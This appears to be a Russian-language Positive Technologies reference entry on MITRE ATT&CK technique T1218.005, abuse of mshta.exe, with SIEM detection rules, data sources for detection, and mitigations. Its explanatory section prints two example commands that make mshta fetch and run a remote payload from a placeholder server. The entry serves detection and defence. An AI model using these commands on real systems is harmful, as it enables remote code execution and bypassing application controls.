T1218.005: Утилита mshta
Злоумышленники могут использовать легитимную утилиту Windows mshta.exe для выполнения вредоносных HTA-файлов, а также JavaScript- или VBScript-кода. Существует несколько типов угроз, использующих mshta.exe на этапе начального заражения и для последующего выполнения кода.
Mshta.exe — это утилита, которая выполняет файлы Microsoft HTML Application (HTA) . HTA — это автономные приложения, работающие на основе тех же моделей и технологий, что и Internet Explorer, но вне браузера .
Mshta.exe может выполнять файлы с помощью встроенного сценария: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
Файлы также могут выполняться напрямую по URL-адресу: mshta http[:]//webserver/payload[.]hta
Mshta.exe может использоваться для обхода механизмов контроля приложений, которые не отслеживают ее использование. Поскольку утилита mshta.exe выполняется вне контекста безопасности Internet Explorer, она также позволяет обходить настройки безопасности браузера .
Какие продукты Positive Technologies покрывают технику
Экспертиза MaxPatrol SIEM
mitre_attck_execution: PT-CR-1089: DotNetToJScript_Usage: Обнаружено возможное использование утилиты DotNetToJscript
hacking_tools: PT-CR-353: Koadic_MSHTA_Stager: Обнаружено возможное использование программного обеспечения Koadic (фреймворк Koadic предназначен для проведения пост-эксплуатации в ОС семейства Windows), которое запускает полезную нагрузку на атакуемом узле с помощью Microsoft Windows HTML Application
mitre_attck_defense_evasion: PT-CR-204: MSHTA_AWL_Bypass: Попытка обойти запрет на запуск приложений с помощью встроенной утилиты Microsoft Windows mshta.exe (используется для выполнения HTML-приложений (.hta))
mitre_attck_defense_evasion: PT-CR-650: Suspicious_File_Created_by_Legal_Process: Обнаруживает создание подозрительных файлов легитимными процессами
Способы обнаружения
ID | DS0009 | Источник и компонент данных | Процесс: Создание процесса | Описание | Отслеживайте процессы для мониторинга запуска утилиты mshta.exe и ее аргументов. |
---|
ID | DS0022 | Источник и компонент данных | Файл: Создание файла | Описание | Отслеживайте использование HTA-файлов. Если они обычно не используются в среде, их запуск может свидетельствовать о подозрительной активности. |
---|
ID | DS0017 | Источник и компонент данных | Команда: Выполнение команд | Описание | Отслеживайте запуск незамаскированных или обфусцированных сценариев утилитой mshta.exe через командную строку. Сопоставляйте недавние вызовы mshta.exe с историей использования известных допустимых аргументов и выполнения допустимых HTA-файлов, чтобы выявить аномальную и потенциально вредоносную активность. Рекомендуется также отслеживать аргументы, которые использовались до и после вызова mshta.exe, чтобы определить происхождение и назначение выполняемого HTA-файла. |
---|
ID | DS0029 | Источник и компонент данных | Сетевой трафик: Создание сетевого подключения | Описание | Отслеживайте создание сетевых соединений с недоверенными узлами. |
---|
Меры противодействия
ID | M1038 | Название | Защита от выполнения | Описание | Используйте контроль приложений, настроенный на блокировку выполнения |
---|
ID | M1042 | Название | Отключение или удаление компонента или программы | Описание | Утилита Mshta.exe может быть не нужна в конкретной среде, поскольку ее функциональность связана со старыми версиями Internet Explorer, срок службы которых истек. |
---|